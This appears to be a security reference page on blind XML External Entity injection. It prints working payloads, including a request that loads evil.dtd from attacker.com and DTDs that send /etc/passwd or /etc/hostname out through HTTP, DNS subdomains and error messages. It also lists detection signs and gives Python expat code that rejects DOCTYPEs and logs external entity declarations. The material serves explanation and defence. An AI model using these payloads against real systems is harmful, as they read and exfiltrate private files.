Blind XXE

Blind XXE is a variant of XML External Entity injection where the application does not return the entity value in its response. Attackers must use out-of-band techniques to exfiltrate data or confirm the vulnerability.

How It Works

When the parser expands external entities but the expanded data is never reflected in the response, the payload instead makes the parser fetch a DTD from a server the attacker controls. That DTD defines further entities whose resolution leaks data through DNS lookups, HTTP requests, or parser error messages.

Out-of-Band Data Exfiltration

<!-- Malicious XML sent to target -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<root></root>

<!-- evil.dtd hosted on attacker server -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;

Error-Based XXE

<!-- In the attacker-hosted DTD: force a parse error whose message includes the file contents -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

DNS Exfiltration

<!-- In the attacker-hosted DTD: leak the file contents as a subdomain label in a DNS lookup -->
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://%file;.attacker.com/'>">
%eval;
%exfil;

Detection Techniques

  • DNS callback to attacker-controlled domain
  • HTTP request to attacker server
  • Triggered error messages containing data
  • Time-based detection (slow file reads)
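As an added defensive example (not code from this page), the two parser hooks a service can use with Python's standard expat binding: rejecting any DOCTYPE outright, which removes blind XXE because parameter entities can only be declared inside a DTD, and inventorying the external entity declarations of a refused request for logging without resolving any of them. The sample document is constructed to mirror the request shown above, with attacker.com as the page's placeholder host; the function and exception names are this example's own.

```python
import xml.parsers.expat as expat

# Constructed sample mirroring the blind XXE request above (attacker.com as on the page).
BLIND_XXE_SAMPLE = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<root></root>"""

class DoctypeRejected(ValueError):
    """The document carries a DOCTYPE; trusted callers here never send one."""

def parse_no_dtd(xml_bytes):
    """Return the element names of a document, aborting on any DOCTYPE. Refusing DTDs
    stops every XXE variant, blind ones included: parameter entities need a DTD."""
    parser = expat.ParserCreate()
    names = []
    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected("DOCTYPE %r is not permitted" % name)
    parser.StartDoctypeDeclHandler = start_doctype
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(xml_bytes, True)
    return names

def is_rejected(xml_bytes):
    """True if parse_no_dtd refuses the document."""
    try:
        parse_no_dtd(xml_bytes)
    except DoctypeRejected:
        return True
    return False

def external_entity_decls(xml_bytes):
    """List (name, is_parameter_entity, system_id) for each external entity a document
    declares, resolving none of them; logged from a rejected request, it records the
    DTD host the payload tried to reach."""
    parser = expat.ParserCreate()
    # Never fetch parameter entities; this is expat's default, made explicit here.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    found = []
    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:  # internal entities carry a value, not a SYSTEM id
            found.append((name, bool(is_param), system_id))
    parser.EntityDeclHandler = entity_decl
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError:
        pass  # declarations seen before a malformed tail still count
    return found
```

The audit function never contacts the declared system identifier, so the DTD at attacker.com is not fetched; the returned URL is what a detection pipeline would record as the callback host.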